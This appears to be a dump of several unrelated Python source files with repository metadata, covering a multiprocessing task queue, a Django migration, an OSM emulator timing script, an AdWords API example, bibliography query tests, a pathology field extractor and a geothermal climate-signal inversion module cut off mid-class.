__all__ = ['Producer', 'Consumer', 'Task']
class Callable(object):
def __call__(self, *args, **kwargs):
raise NotImplementedError('%s not callable' % self)
def run(self, *args, **kwargs):
raise NotImplementedError('%s.run() not implemented' % self)
class Producer(Callable):
def __init__(self, todo_list=None, max_qsize=None):
manager = Manager()
self._q = manager.Queue()
self._q_lock = manager.Lock()
self._q_close_event = manager.Event()
self._max_qsize = max_qsize or 0
todo_list = todo_list or []
if isinstance(todo_list, (list, tuple)) and len(todo_list) > 0:
self.put(todo_list)
super(Producer, self).__init__()
@property
def q_size(self):
return self._q.qsize()
def __call__(self, q, lock, close_event, *args, **kwargs):
for i, data in enumerate(self.run()):
with lock:
q.put(data)
print 'pid %s put %d: %s' % (os.getpid(), i, data)
def run(self):
while 1:
with self._q_lock:
if self._q.empty():
if self._q_close_event.is_set():
break
else:
time.sleep(0.01)
continue
yield self._q.get()
def put(self, *todos):
for todo in todos:
with self._q_lock:
self._q.put(todo)
def finish(self):
try:
self._q_close_event.set()
except Exception as e:
print e
class Consumer(Callable):
def __init__(self, fn=None):
self._fn = fn
self.results = []
super(Consumer, self).__init__()
def __call__(self, q, lock, close_event, *args, **kwargs):
while 1:
with lock:
if q.empty():
if close_event.is_set():
break
else:
time.sleep(0.01)
continue
data = q.get()
self.results.append(self.run(data, *args, **kwargs))
return self.results
def run(self, data, *args, **kwargs):
if self._fn:
return self._fn(data, *args, **kwargs)
class Task(object):
"""
a multiprocess model of producer/consumer
"""
def __init__(self, fn,
producer_count=None,
consumer_count=None,
callback=None,
batch=True,
counter=None,
**shared
):
"""
init producer/consumer task
Args:
            fn: the consumer function, called as fn(data, counter, q_size, *args, **shared_vars)
producer_count: producer process count, default: 1
consumer_count: consumer process count, default: cpu_count - 1
callback: callback func after f calling completed
            batch: if True, the 'todo_list' passed to `task.put(todo_list)` is processed
                all at once as a batch; if False, todo_list items are processed one by one
counter: process shared counter, need custom imp in <fn>
**shared: process shared object data
"""
cpus = cpu_count()
        if producer_count is None or producer_count < 1 or producer_count > cpus:
            producer_count = 1
        if consumer_count is None or consumer_count < 1 or consumer_count > cpus:
            consumer_count = cpus - 1
print 'producer_count=%s consumer_count=%s' % (producer_count, consumer_count)
self._callback = callback
self.batch = batch
manager = Manager()
self.q = manager.Queue()
self.lock = manager.Lock()
self.event = manager.Event()
self._counter = manager.Value('counter', counter or 0)
self._shared = {var_name: manager.Value(var_name, var_value) for var_name, var_value in shared.iteritems()}
self.producerProcessList = [Producer() for _ in xrange(producer_count)]
self.consumerProcessList = [Consumer(fn=fn) for _ in xrange(consumer_count)]
self.pool = ProcessPool(consumer_count + producer_count)
@property
def q_size(self):
return self.q.qsize() + sum([x.q_size or 0 for x in self.producerProcessList])
@property
def counter(self):
return self._counter.value
@property
def shared(self):
return {var_name: var_value_proxy.value for var_name, var_value_proxy in self._shared.iteritems()}
def put(self, todo_list):
producer = self.producerProcessList.pop(0)
if self.batch:
producer.put(todo_list)
else:
producer.put(*todo_list)
self.producerProcessList.append(producer)
time.sleep(0.01)
def run(self, *args, **kwargs):
results = []
arg = (self.q, self.lock, self.event, self._counter, self.q_size)
kwargs.update(self._shared)
for producer in self.producerProcessList:
self.pool.apply_async(producer, arg + args, kwargs)
for consumer in self.consumerProcessList:
results.append(self.pool.apply_async(consumer, arg + args, kwargs, self._cb))
return results
def _cb(self, *args, **kwargs):
if self._callback:
self._callback(self.counter, self._shared)
def finish(self):
for producer in self.producerProcessList:
producer.finish()
self.pool.close()
time.sleep(0.03)
self.event.set()
self.pool.join()
# def work(data, counter, *args, **kwargs):
# pid = os.getpid()
# print '%s doing %s' % (pid, data)
# # counter = args[0] if len(args) > 0 else None
# if counter:
# counter.value += 1
# kwargs['var_a'].value += chr(len(kwargs['var_a'].value) + 65)
# return '%s result' % pid
#
#
# def cb(*args, **kwargs):
# print 'callback', args, kwargs
#
#
# def test():
# import random
# n = 0
# task = Task(work, 1, 3, counter=n, var_a='', callback=cb)
# results = task.run()
# for i in xrange(26):
# lines = ["%d" % i] * random.randint(10, 20)
# task.put(lines)
#
# task.finish()
#
# print 'end counter', task.counter
# print 'shared.var_a', task.shared['var_a']
# print 'results:\n' + '\n'.join([str(res.get()) for res in results])
#
# if __name__ == '__main__':
# test()
|
Vito2015/pyextend
|
pyextend/core/thread/multiprocessTask.py
|
Python
|
gpl-2.0
| 6,887 | 0.001452 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-30 01:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='USER',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('userid', models.CharField(max_length=200)),
('userpassword', models.CharField(max_length=200)),
('add', models.CharField(max_length=200)),
('phone', models.CharField(max_length=200)),
],
),
]
|
meliora000/eb_django_app
|
django_eb/users/migrations/0001_initial.py
|
Python
|
mit
| 796 | 0.001256 |
#!/usr/bin/env python2
# Copyright (c) 2019 Erik Schilling
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import time
from emuvim.api.openstack.openstack_api_endpoint import OpenstackApiEndpoint
from emuvim.api.osm.kafka import Kafka
from emuvim.api.osm.lcm import LCM
from emuvim.api.osm.mongo import Mongo
from emuvim.api.osm.mysql import Mysql
from emuvim.api.osm.nbi import NBI
from emuvim.api.osm.ro import RO
from emuvim.api.osm.zookeeper import Zookeeper
from emuvim.dcemulator.net import DCNetwork
from mininet.log import setLogLevel
setLogLevel('debug')
COUNT = 15
with open('osm_component_startup_%d.csv' % time.time(), 'w') as csvfile:
fieldnames = ['other', 'zookeeper', 'kafka', 'mongo', 'nbi', 'ro_db', 'ro', 'lcm']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for i in range(COUNT):
start = time.time()
net = DCNetwork(monitor=False, enable_learning=True)
api = None
try:
dc1 = net.addDatacenter("dc1")
api = OpenstackApiEndpoint("0.0.0.0", 6001)
api.connect_datacenter(dc1)
api.connect_dc_network(net)
s1 = net.addSwitch('s1')
zookeeper_ip = '10.0.0.96'
kafka_ip = '10.0.0.97'
mongo_ip = '10.0.0.98'
nbi_ip = '10.0.0.99'
ro_db_ip = '10.0.0.100'
ro_ip = '10.0.0.101'
lcm_ip = '10.0.0.102'
d1 = net.addDocker('d1', dimage='ubuntu:trusty')
VERSION = 'releasefive-daily'
zookeeper = Zookeeper(net, zookeeper_ip)
kafka = Kafka(net, kafka_ip, zookeeper_ip)
mongo = Mongo(net, mongo_ip)
nbi = NBI(net, nbi_ip, mongo_ip, kafka_ip)
ro_db = Mysql(net, ro_db_ip)
ro = RO(net, ro_ip, ro_db_ip, version=VERSION)
lcm = LCM(net, lcm_ip, ro_ip, mongo_ip, kafka_ip)
net.addLink(d1, s1)
net.addLink(zookeeper.instance, s1)
net.addLink(kafka.instance, s1)
net.addLink(mongo.instance, s1)
net.addLink(nbi.instance, s1)
net.addLink(ro_db.instance, s1)
net.addLink(ro.instance, s1)
net.addLink(lcm.instance, s1)
net.start()
api.start()
other_end = time.time()
zookeeper.start()
zookeeper_started = time.time()
kafka.start()
kafka_started = time.time()
mongo.start()
mongo_started = time.time()
nbi.start()
nbi_started = time.time()
ro_db.start()
ro_db_started = time.time()
ro.start()
ro_started = time.time()
lcm.start()
lcm_started = time.time()
writer.writerow({
'other': other_end - start,
'zookeeper': zookeeper_started - other_end,
'kafka': kafka_started - zookeeper_started,
'mongo': mongo_started - kafka_started,
'nbi': nbi_started - mongo_started,
'ro_db': ro_db_started - nbi_started,
'ro': ro_started - ro_db_started,
'lcm': lcm_started - ro_started,
})
csvfile.flush()
finally:
net.stop()
            if api:
                api.stop()
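# Each CSV row then records the wall-clock seconds spent in every startup phase,
# e.g. (hypothetical numbers):
#
#   other,zookeeper,kafka,mongo,nbi,ro_db,ro,lcm
#   14.2,3.8,9.5,4.1,6.7,5.3,8.0,7.6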
|
mpeuster/son-emu
|
examples/performance_measurements/osm_component_startup.py
|
Python
|
apache-2.0
| 3,883 | 0.000258 |
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adds an ad customizer feed.
Associates the feed with customer and adds an ad that uses the feed to populate
dynamic data.
"""
from datetime import datetime
from uuid import uuid4
# Import appropriate classes from the client library.
from googleads import adwords
from googleads import errors
FEED_NAME = 'Interplanetary Feed Name %s' % uuid4()
ADGROUPS = [
'INSERT_ADGROUP_ID_1_HERE',
'INSERT_ADGROUP_ID_2_HERE'
]
def CreateAdsWithCustomizations(client, adgroup_ids, feed_name):
"""Creates ExpandedTextAds that use ad customizations for specified AdGroups.
Args:
client: an AdWordsClient instance.
adgroup_ids: a list containing the AdGroup ids to add ExpandedTextAds to.
feed_name: the name of the feed used to apply customizations.
Raises:
GoogleAdsError: if no ExpandedTextAds were added.
"""
# Get the AdGroupAdService
adgroup_ad_service = client.GetService('AdGroupAdService', 'v201809')
expanded_text_ad = {
'xsi_type': 'ExpandedTextAd',
'headlinePart1': 'Luxury Cruise to {=%s.Name}' % feed_name,
'headlinePart2': 'Only {=%s.Price}' % feed_name,
'description': 'Offer ends in {=countdown(%s.Date)}!' % feed_name,
'finalUrls': ['http://www.example.com'],
}
# We add the same ad to both ad groups. When they serve, they will show
# different values, since they match different feed items.
operations = [{
'operator': 'ADD',
'operand': {
'adGroupId': adgroup,
'ad': expanded_text_ad
}
} for adgroup in adgroup_ids]
response = adgroup_ad_service.mutate(operations)
if response and 'value' in response:
for ad in response['value']:
print('Created an ad with ID "%s", type "%s", and status "%s".'
% (ad['ad']['id'], ad['ad']['Ad.Type'], ad['status']))
else:
raise errors.GoogleAdsError('No ads were added.')
def CreateCustomizerFeed(client, feed_name):
"""Creates a new AdCustomizerFeed.
Args:
client: an AdWordsClient instance.
feed_name: the name for the new AdCustomizerFeed.
Returns:
The new AdCustomizerFeed.
"""
# Get the AdCustomizerFeedService
ad_customizer_feed_service = client.GetService('AdCustomizerFeedService',
'v201809')
customizer_feed = {
'feedName': feed_name,
'feedAttributes': [
{'type': 'STRING', 'name': 'Name'},
{'type': 'STRING', 'name': 'Price'},
{'type': 'DATE_TIME', 'name': 'Date'}
]
}
feed_service_operation = {
'operator': 'ADD',
'operand': customizer_feed
}
response = ad_customizer_feed_service.mutate([feed_service_operation])
if response and 'value' in response:
feed = response['value'][0]
feed_data = {
'feedId': feed['feedId'],
'nameId': feed['feedAttributes'][0]['id'],
'priceId': feed['feedAttributes'][1]['id'],
'dateId': feed['feedAttributes'][2]['id']
}
print('Feed with name "%s" and ID %s was added with:\n'
          '\tName attribute ID %s and price attribute ID %s and date attribute '
'ID %s') % (feed['feedName'], feed['feedId'], feed_data['nameId'],
feed_data['priceId'], feed_data['dateId'])
return feed
else:
raise errors.GoogleAdsError('No feeds were added')
def RestrictFeedItemToAdGroup(client, feed_item, adgroup_id):
"""Restricts the feed item to an ad group.
Args:
client: an AdWordsClient instance.
feed_item: The feed item.
adgroup_id: The ad group ID.
"""
# Get the FeedItemTargetService
feed_item_target_service = client.GetService(
'FeedItemTargetService', 'v201809')
# Optional: Restrict the first feed item to only serve with ads for the
# specified ad group ID.
ad_group_target = {
'xsi_type': 'FeedItemAdGroupTarget',
'feedId': feed_item['feedId'],
'feedItemId': feed_item['feedItemId'],
'adGroupId': adgroup_id
}
operation = {'operator': 'ADD', 'operand': ad_group_target}
response = feed_item_target_service.mutate([operation])
new_ad_group_target = response['value'][0]
print('Feed item target for feed ID %s and feed item ID %s was created to '
'restrict serving to ad group ID %s' %
(new_ad_group_target['feedId'],
new_ad_group_target['feedItemId'],
new_ad_group_target['adGroupId']))
def CreateCustomizerFeedItems(client, adgroup_ids, ad_customizer_feed):
"""Creates FeedItems for the specified AdGroups.
These FeedItems contain values to use in ad customizations for the AdGroups.
Args:
client: an AdWordsClient instance.
adgroup_ids: a list containing two AdGroup Ids.
ad_customizer_feed: the AdCustomizerFeed we're associating the FeedItems
with.
Raises:
GoogleAdsError: if no FeedItems were added.
"""
# Get the FeedItemService
feed_item_service = client.GetService('FeedItemService', 'v201809')
now = datetime.now()
mars_date = datetime(now.year, now.month, 1, 0, 0)
venus_date = datetime(now.year, now.month, 15, 0, 0)
time_format = '%Y%m%d %H%M%S'
feed_item_operations = [
CreateFeedItemAddOperation(
'Mars', '$1234.56', mars_date.strftime(time_format),
ad_customizer_feed),
CreateFeedItemAddOperation(
'Venus', '$1450.00', venus_date.strftime(time_format),
ad_customizer_feed)
]
response = feed_item_service.mutate(feed_item_operations)
if 'value' in response:
for feed_item in response['value']:
print('Added FeedItem with ID %d.' % feed_item['feedItemId'])
else:
raise errors.GoogleAdsError('No FeedItems were added.')
for feed_item, adgroup_id in zip(response['value'], adgroup_ids):
RestrictFeedItemToAdGroup(client, feed_item, adgroup_id)
def CreateFeedItemAddOperation(name, price, date, ad_customizer_feed):
"""Creates a FeedItemOperation.
The generated FeedItemOperation will create a FeedItem with the specified
values when sent to FeedItemService.mutate.
Args:
name: the value for the name attribute of the FeedItem.
price: the value for the price attribute of the FeedItem.
date: the value for the date attribute of the FeedItem.
ad_customizer_feed: the AdCustomizerFeed we're associating the FeedItems
with.
Returns:
A new FeedItemOperation for adding a FeedItem.
"""
feed_item = {
'feedId': ad_customizer_feed['feedId'],
'attributeValues': [
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][0]['id'],
'stringValue': name
},
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][1]['id'],
'stringValue': price
},
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][2]['id'],
'stringValue': date
}
]
}
operation = {
'operator': 'ADD',
'operand': feed_item
}
return operation
def main(client, adgroup_ids, feed_name=FEED_NAME):
# Create a customizer feed. One feed per account can be used for all ads.
ad_customizer_feed = CreateCustomizerFeed(client, feed_name)
# Add feed items containing the values we'd like to place in ads.
CreateCustomizerFeedItems(client, adgroup_ids, ad_customizer_feed)
# All set! We can now create ads with customizations.
CreateAdsWithCustomizations(client, adgroup_ids, feed_name)
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client, ADGROUPS)
|
googleads/googleads-python-lib
|
examples/adwords/v201809/advanced_operations/add_ad_customizer.py
|
Python
|
apache-2.0
| 8,193 | 0.006713 |
# coding: utf8
from __future__ import unicode_literals
import unittest
import dotdot
from pubs.query import (AuthorFilter, CitekeyFilter, FieldFilter,
YearFilter, _query_block_to_filter,
get_paper_filter, InvalidQuery)
from pubs.paper import Paper
import fixtures
doe_paper = Paper.from_bibentry(fixtures.doe_bibentry)
page_paper = Paper.from_bibentry(fixtures.page_bibentry)
turing_paper = Paper.from_bibentry(fixtures.turing_bibentry,
metadata=fixtures.turing_metadata)
class TestAuthorFilter(unittest.TestCase):
def test_fails_if_no_author(self):
no_doe = doe_paper.deepcopy()
no_doe.bibentry['Doe2013']['author'] = []
self.assertFalse(AuthorFilter('whatever')(no_doe))
def test_match_case(self):
self.assertTrue(AuthorFilter('doe')(doe_paper))
self.assertTrue(AuthorFilter('doe', case_sensitive=False)(doe_paper))
self.assertTrue(AuthorFilter('Doe')(doe_paper))
def test_do_not_match_case(self):
self.assertFalse(AuthorFilter('dOe')(doe_paper))
self.assertFalse(AuthorFilter('dOe', case_sensitive=True)(doe_paper))
self.assertFalse(AuthorFilter('doe', case_sensitive=True)(doe_paper))
self.assertTrue(AuthorFilter('dOe', case_sensitive=False)(doe_paper))
def test_match_not_first_author(self):
self.assertTrue(AuthorFilter('motwani')(page_paper))
def test_do_not_match_first_name(self):
self.assertFalse(AuthorFilter('lawrence')(page_paper))
class TestCitekeyFilter(unittest.TestCase):
def test_fails_if_no_citekey(self):
no_citekey = doe_paper.deepcopy()
no_citekey.citekey = ''
self.assertFalse(CitekeyFilter('whatever')(no_citekey))
def test_match_case(self):
self.assertTrue(CitekeyFilter('doe201')(doe_paper))
self.assertTrue(CitekeyFilter('doe201', case_sensitive=False)(doe_paper))
self.assertTrue(CitekeyFilter('Doe201')(doe_paper))
def test_do_not_match_case(self):
self.assertFalse(CitekeyFilter('dOe201')(doe_paper))
self.assertFalse(CitekeyFilter('dOe201', case_sensitive=True)(doe_paper))
self.assertFalse(CitekeyFilter('doe201', case_sensitive=True)(doe_paper))
self.assertTrue(CitekeyFilter('dOe201', case_sensitive=False)(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "{G}r{\\\"u}n2013"
self.assertTrue(CitekeyFilter('Grün')(latexenc_paper))
self.assertTrue(CitekeyFilter('Gr{\\\"u}n')(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Jalape\u00f1o2013"
self.assertTrue(CitekeyFilter("Jalapen\u0303o")(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Jalape\u00f1o2013"
self.assertFalse(CitekeyFilter("Jalapen\u0303o", strict=True)(latexenc_paper))
latexenc_paper.citekey = "{G}ros2013"
self.assertFalse(CitekeyFilter("Gros", strict=True)(latexenc_paper))
def test_strict_implies_case(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Gros2013"
self.assertFalse(
CitekeyFilter("gros", case_sensitive=False, strict=True)(latexenc_paper))
class TestCheckTag(unittest.TestCase):
pass
class TestCheckYear(unittest.TestCase):
def test_single_year(self):
self.assertTrue(YearFilter('2013')(doe_paper))
self.assertFalse(YearFilter('2014')(doe_paper))
def test_before_year(self):
self.assertTrue(YearFilter('-2013')(doe_paper))
self.assertTrue(YearFilter('-2014')(doe_paper))
self.assertFalse(YearFilter('-2012')(doe_paper))
def test_after_year(self):
self.assertTrue(YearFilter('2013-')(doe_paper))
self.assertTrue(YearFilter('2012-')(doe_paper))
self.assertFalse(YearFilter('2014-')(doe_paper))
def test_year_range(self):
self.assertTrue(YearFilter('')(doe_paper))
self.assertTrue(YearFilter('-')(doe_paper))
self.assertTrue(YearFilter('2013-2013')(doe_paper))
self.assertTrue(YearFilter('2012-2014')(doe_paper))
self.assertFalse(YearFilter('2014-2015')(doe_paper))
with self.assertRaises(ValueError):
YearFilter('2015-2014')(doe_paper)
class TestCheckField(unittest.TestCase):
def test_match_case(self):
self.assertTrue(FieldFilter('title', 'nice')(doe_paper))
self.assertTrue(
FieldFilter('title', 'nice', case_sensitive=False)(doe_paper))
self.assertTrue(FieldFilter('year', '2013')(doe_paper))
def test_do_not_match_case(self):
self.assertTrue(
FieldFilter('title', 'Title', case_sensitive=True)(doe_paper))
self.assertFalse(
FieldFilter('title', 'nice', case_sensitive=True)(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "{G}r{\\\"u}n"
self.assertTrue(
FieldFilter('title', 'Grün')(latexenc_paper))
self.assertTrue(
FieldFilter('title', 'Gr{\\\"u}n')(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Jalape\u00f1o"
self.assertTrue(
FieldFilter('title', "Jalapen\u0303o")(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Jalape\u00f1o"
self.assertFalse(FieldFilter('title', "Jalapen\u0303o",
strict=True)(latexenc_paper))
latexenc_paper.bibentry['Doe2013']['title'] = "{G}ros"
self.assertFalse(
FieldFilter('title', "Gros", strict=True)(latexenc_paper))
def test_strict_implies_case(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Gros"
self.assertFalse(
FieldFilter('title', "gros", case_sensitive=False,
strict=True)(latexenc_paper))
class TestCheckQueryBlock(unittest.TestCase):
def test_raise_invalid_if_no_value(self):
with self.assertRaises(InvalidQuery):
_query_block_to_filter('title')
def test_raise_invalid_if_too_much(self):
with self.assertRaises(InvalidQuery):
_query_block_to_filter('whatever:value:too_much')
class TestFilterPaper(unittest.TestCase):
def test_case(self):
self.assertTrue(get_paper_filter(['title:nice'])(doe_paper))
self.assertTrue(get_paper_filter(['title:Nice'])(doe_paper))
self.assertFalse(get_paper_filter(['title:nIce'])(doe_paper))
def test_fields(self):
self.assertTrue(get_paper_filter(['year:2013'])(doe_paper))
self.assertTrue(get_paper_filter(['year:2010-'])(doe_paper))
self.assertFalse(get_paper_filter(['year:2014'])(doe_paper))
self.assertTrue(get_paper_filter(['author:doe'])(doe_paper))
self.assertTrue(get_paper_filter(['author:Doe'])(doe_paper))
def test_tags(self):
self.assertTrue(get_paper_filter(['tag:computer'])(turing_paper))
self.assertFalse(get_paper_filter(['tag:Ai'])(turing_paper))
self.assertTrue(get_paper_filter(['tag:AI'])(turing_paper))
self.assertTrue(get_paper_filter(['tag:ai'])(turing_paper))
def test_multiple(self):
self.assertTrue(get_paper_filter(['author:doe', 'year:2013'])(doe_paper))
self.assertTrue(get_paper_filter(['author:doe', 'year:2010-2014'])(doe_paper))
self.assertFalse(get_paper_filter(['author:doe', 'year:2014-'])(doe_paper))
self.assertFalse(get_paper_filter(['author:doee', 'year:2014'])(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = r"{E}l Ni{\~n}o"
latexenc_paper.bibentry['Doe2013']['author'][0] = r"Erd\H{o}s, Paul"
self.assertTrue(get_paper_filter(['title:El'])(latexenc_paper))
self.assertTrue(get_paper_filter(['title:Niño'])(latexenc_paper))
self.assertTrue(get_paper_filter(['author:erdős'])(latexenc_paper))
self.assertTrue(get_paper_filter(['title:{E}l'])(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = r"{E}l Ni{\~n}o"
self.assertTrue(get_paper_filter(['title:Nin\u0303o'])(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = r"El Ni{\~n}o"
self.assertFalse(get_paper_filter(
['title:Nin\u0303o'], strict=True)(latexenc_paper))
if __name__ == '__main__':
unittest.main()
|
pubs/pubs
|
tests/test_queries.py
|
Python
|
lgpl-3.0
| 9,022 | 0.001331 |
'''author@esilgard'''
#
# Copyright (c) 2014-2016 Fred Hutchinson Cancer Research Center
#
# Licensed under the Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
#
from OneFieldPerReport import OneFieldPerReport
import global_strings as gb
class Pathologist(OneFieldPerReport):
''' extract the name of the pathologist who initially signed the report '''
__version__ = 'Pathologist1.0'
def __init__(self):
super(Pathologist, self).__init__()
self.field_name = 'Pathologist'
self.regex = r'\n([A-Za-z\'\-,. ]+) MD(, PhD)?[ ]*\n[ ]*Pathologist[ ]*\n'
self.confidence = 1
self.match_style = 'first'
self.table = gb.PATHOLOGY_TABLE
self.value_type = 'match'
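# A minimal sketch of the signature block the regex above is meant to capture
# (hypothetical report footer; real reports may differ):
#
#   ...end of report text...
#   Jane A. Doe MD, PhD
#   Pathologist
#
# group(1) of the first match would then be 'Jane A. Doe'.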
|
esilgard/BreastMR
|
fhcrc_pathology/Pathologist.py
|
Python
|
apache-2.0
| 744 | 0.005376 |
r"""
Modeling and inversion of temperature residuals measured in wells due to
temperature perturbations at the surface.
Perturbations can be of two kinds: **abrupt** or **linear**.
Forward modeling of these types of changes is done with functions:
* :func:`~fatiando.geothermal.climsig.abrupt`
* :func:`~fatiando.geothermal.climsig.linear`
Assuming that the temperature perturbation was abrupt, the residual
temperature at a depth :math:`z_i` in the well at a time :math:`t` after the
perturbation is given by
.. math::
T_i(z_i) = A \left[1 - \mathrm{erf}\left(
\frac{z_i}{\sqrt{4\lambda t}}\right)\right]
where :math:`A` is the amplitude of the perturbation, :math:`\lambda` is the
thermal diffusivity of the medium, and :math:`\mathrm{erf}` is the error
function.
For the case of a linear change, the temperature is
.. math::
T_i(z_i) = A \left[
\left(1 + 2\frac{z_i^2}{4\lambda t}\right)
\mathrm{erfc}\left(\frac{z_i}{\sqrt{4\lambda t}}\right) -
\frac{2}{\sqrt{\pi}}\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\mathrm{exp}\left(-\frac{z_i^2}{4\lambda t}\right)
\right]
Given the temperature measured at different depths, we can **invert** for the
amplitude and age of the change. The available inversion solvers are:
* :class:`~fatiando.geothermal.climsig.SingleChange`: inverts for the
parameters of a single temperature change. Can use both abrupt and linear
models.
----
"""
from __future__ import division
import numpy
import scipy.special
from ..inversion.base import Misfit
from ..constants import THERMAL_DIFFUSIVITY_YEAR
def linear(amp, age, zp, diffus=THERMAL_DIFFUSIVITY_YEAR):
"""
Calculate the residual temperature profile in depth due to a linear
temperature perturbation.
Parameters:
* amp : float
Amplitude of the perturbation (in C)
* age : float
Time since the perturbation occured (in years)
* zp : array
The depths of computation points along the well (in meters)
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
See the default values for the thermal diffusivity in
:mod:`fatiando.constants`.
Returns
* temp : array
The residual temperatures measured along the well
"""
tmp = zp / numpy.sqrt(4. * diffus * age)
res = amp * ((1. + 2 * tmp ** 2) * scipy.special.erfc(tmp)
- 2. / numpy.sqrt(numpy.pi) * tmp * numpy.exp(-tmp ** 2))
return res
def abrupt(amp, age, zp, diffus=THERMAL_DIFFUSIVITY_YEAR):
"""
Calculate the residual temperature profile in depth due to an abrupt
temperature perturbation.
Parameters:
* amp : float
Amplitude of the perturbation (in C)
* age : float
Time since the perturbation occured (in years)
* zp : array
        Array with the depths of computation points along the well (in meters)
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
See the default values for the thermal diffusivity in
:mod:`fatiando.constants`.
Returns
* temp : array
The residual temperatures measured along the well
"""
return amp * (1. - scipy.special.erf(zp / numpy.sqrt(4. * diffus * age)))
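# A quick forward-model sketch with synthetic values (mirroring the doctests
# further down; only an amplitude, an age and the depths are needed):
#
#   >>> import numpy
#   >>> zp = numpy.arange(0, 100, 1.)
#   >>> temp = abrupt(2., 100., zp)    # 2 C abrupt change, 100 years ago
#   >>> float(temp[0])                 # full amplitude right at the surface
#   2.0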
class SingleChange(Misfit):
r"""
Invert the well temperature data for a single change in temperature.
The parameters of the change are its amplitude and age.
See the docstring of :mod:`fatiando.geothermal.climsig` for more
information and examples.
Parameters:
* temp : array
The temperature profile
* zp : array
Depths along the profile
* mode : string
The type of change: ``'abrupt'`` for an abrupt change, ``'linear'`` for
a linear change.
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
.. note::
The recommended solver for this inverse problem is the
        Levenberg-Marquardt method. Since this is a non-linear problem, set the
desired method and initial solution using the
:meth:`~fatiando.inversion.base.FitMixin.config` method.
        See the example below.
Example with synthetic data:
>>> import numpy
>>> zp = numpy.arange(0, 100, 1)
>>> # For an ABRUPT change
>>> amp = 2
>>> age = 100 # Uses years to avoid overflows
>>> temp = abrupt(amp, age, zp)
>>> # Run the inversion for the amplitude and time
    >>> # This is a non-linear problem, so use the Levenberg-Marquardt
>>> # algorithm with an initial estimate
>>> solver = SingleChange(temp, zp, mode='abrupt').config(
... 'levmarq', initial=[1, 1])
>>> amp_, age_ = solver.fit().estimate_
>>> print "amp: %.2f age: %.2f" % (amp_, age_)
amp: 2.00 age: 100.00
>>> # For a LINEAR change
>>> amp = 3.45
>>> age = 52.5
>>> temp = linear(amp, age, zp)
>>> solver = SingleChange(temp, zp, mode='linear').config(
... 'levmarq', initial=[1, 1])
>>> amp_, age_ = solver.fit().estimate_
>>> print "amp: %.2f age: %.2f" % (amp_, age_)
amp: 3.45 age: 52.50
Notes:
For **abrupt** changes, derivatives with respect to the amplitude and age
are calculated using the formula
.. math::
\frac{\partial T_i}{\partial A} = 1 - \mathrm{erf}\left(
\frac{z_i}{\sqrt{4\lambda t}}\right)
and
.. math::
\frac{\partial T_i}{\partial t} = \frac{A}{t\sqrt{\pi}}
\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\exp\left[-\left(\frac{z_i}{\sqrt{4\lambda t}}\right)^2\right]
respectively.
For **linear** changes, derivatives with respect to the age are calculated
using a 2-point finite difference approximation. Derivatives with respect
to amplitude are calculate using the formula
.. math::
\frac{\partial T_i}{\partial A} =
\left(1 + 2\frac{z_i^2}{4\lambda t}\right)
\mathrm{erfc}\left(\frac{z_i}{\sqrt{4\lambda t}}\right) -
\frac{2}{\sqrt{\pi}}\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\mathrm{exp}\left(-\frac{z_i^2}{4\lambda t}\right)
"""
def __init__(self, temp, zp, mode, diffus=THERMAL_DIFFUSIVITY_YEAR):
if len(temp) != len(zp):
raise ValueError("temp and zp must be of same length")
if mode not in ['abrupt', 'linear']:
raise ValueError("Invalid mode: %s. Must be 'abrupt' or 'linear'"
% (mode))
super(SingleChange, self).__init__(
data=temp,
positional=dict(zp=zp),
model=dict(diffus=float(diffus), mode=mode),
